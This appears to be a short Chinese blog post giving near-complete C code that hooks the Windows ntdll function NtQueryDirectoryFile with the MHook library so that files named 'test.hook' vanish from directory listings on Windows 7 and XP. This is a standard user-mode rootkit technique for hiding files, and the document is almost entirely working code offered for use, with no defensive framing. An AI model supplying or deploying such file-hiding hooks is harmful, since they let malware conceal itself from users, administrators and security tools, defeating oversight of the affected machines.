API Hook NtQueryDirectoryFile 隐藏文件
使用MHOOK来 hook ntdll 中的NtQueryDirectoryFile 来实现隐藏文件名为test.hook的文件,有很多结构体需要自己定义直接Copy过来即可,下面给出关键代码。
typedef NTSTATUS (WINAPI *NTQUERYDIRECTORYFILE)(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PVOID ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan);
NTQUERYDIRECTORYFILE TrueNtQueryDirectoryFile=(NTQUERYDIRECTORYFILE)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQueryDirectoryFile");
NTSTATUS WINAPI ZwNewNtQueryDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PVOID ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan){
NTSTATUS Status=STATUS_SUCCESS;
Status=TrueNtQueryDirectoryFile(FileHandle,Event ,ApcRoutine,
ApcContext ,IoStatusBlock,FileInformation,Length,
FileInformationClass,ReturnSingleEntry,FileName ,RestartScan);
if (!NT_SUCCESS(Status))
{
return Status;
}
//win7
if(FileIdBothDirectoryInformation==FileInformationClass){
PFILE_ID_BOTH_DIR_INFORMATION pFileInfo = (PFILE_ID_BOTH_DIR_INFORMATION)FileInformation;
PFILE_ID_BOTH_DIR_INFORMATION pLastFileInfo = NULL;
BOOL bLastFlag=FALSE;
do
{
bLastFlag=!(pFileInfo->NextEntryOffset);
if (NULL!=wcsstr(pFileInfo->FileName,L"test.hook"))
{
OutputDebugStringW(L"已发现目标");
if (bLastFlag&&pLastFileInfo) //链表里最后一个文件
{
pLastFileInfo->NextEntryOffset=0;
break;
}
else
{
int iPos = (ULONG)pFileInfo - (ULONG)FileInformation;
int iLeft = (ULONG)Length - iPos - pFileInfo->NextEntryOffset;
RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), iLeft );
continue;
}
}
pLastFileInfo=pFileInfo;
pFileInfo=(PFILE_ID_BOTH_DIR_INFORMATION)((CHAR*)pFileInfo+pFileInfo->NextEntryOffset);
}while(!bLastFlag);
}
//xp
else if(FileBothDirectoryInformation==FileInformationClass){
PFILE_BOTH_DIR_INFORMATION pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation;
PFILE_BOTH_DIR_INFORMATION pLastFileInfo = NULL;
BOOL bLastFlag=FALSE;
do
{
bLastFlag=!(pFileInfo->NextEntryOffset);
if (NULL!=wcsstr(pFileInfo->FileName,L"test.hook"))
{
OutputDebugStringW(L"已发现目标");
if (bLastFlag&&pLastFileInfo) //链表里最后一个文件
{
pLastFileInfo->NextEntryOffset=0;
break;
}
else
{
int iPos = (ULONG)pFileInfo - (ULONG)FileInformation;
int iLeft = (ULONG)Length - iPos - pFileInfo->NextEntryOffset;
RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), iLeft );
continue;
}
}
pLastFileInfo=pFileInfo;
pFileInfo=(PFILE_BOTH_DIR_INFORMATION)((CHAR*)pFileInfo+pFileInfo->NextEntryOffset);
}while(!bLastFlag);
}
return Status;
}